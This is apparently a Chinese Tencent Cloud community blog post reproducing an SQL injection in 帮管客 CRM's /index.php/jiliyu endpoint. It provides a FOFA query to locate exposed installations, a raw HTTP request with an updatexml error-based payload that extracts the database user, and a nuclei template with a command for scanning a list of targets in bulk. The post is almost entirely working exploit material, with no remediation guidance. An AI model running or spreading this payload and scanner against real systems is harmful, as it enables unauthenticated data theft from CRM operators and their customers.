前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >帮管客 CRM jiliyu SQL注入漏洞

帮管客 CRM jiliyu SQL注入漏洞

原创
作者头像
samRsa
发布2024-03-12 09:15:13
1450
发布2024-03-12 09:15:13
举报
文章被收录于专栏:漏洞复现漏洞复现

1、fofa语句

代码语言:yaml
复制
app="帮管客-CRM"

2、数据包

代码语言:yaml
复制
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: XXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

3、复现截图

4、nuclei POC

基本命令: nuclei.exe -l 网址文件.txt -t POC.yaml

代码语言:yaml
复制
id: BGK-CRM-indexphp-jiliyu-SQL

info:
  name: 帮管客CRM 客户管理系统/index.php/jiliyu 接口存在 sql 注入漏洞,未经身份认证的攻击者可通过此漏洞获取数据库敏感信息
  author: someone
  severity: high
  metadata: 
    fofa-query: app="帮管客-CRM"
http:
  - raw:
      - |
        GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36


    matchers:
      - type: dsl
        dsl:
          - contains_all(body,"@")

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档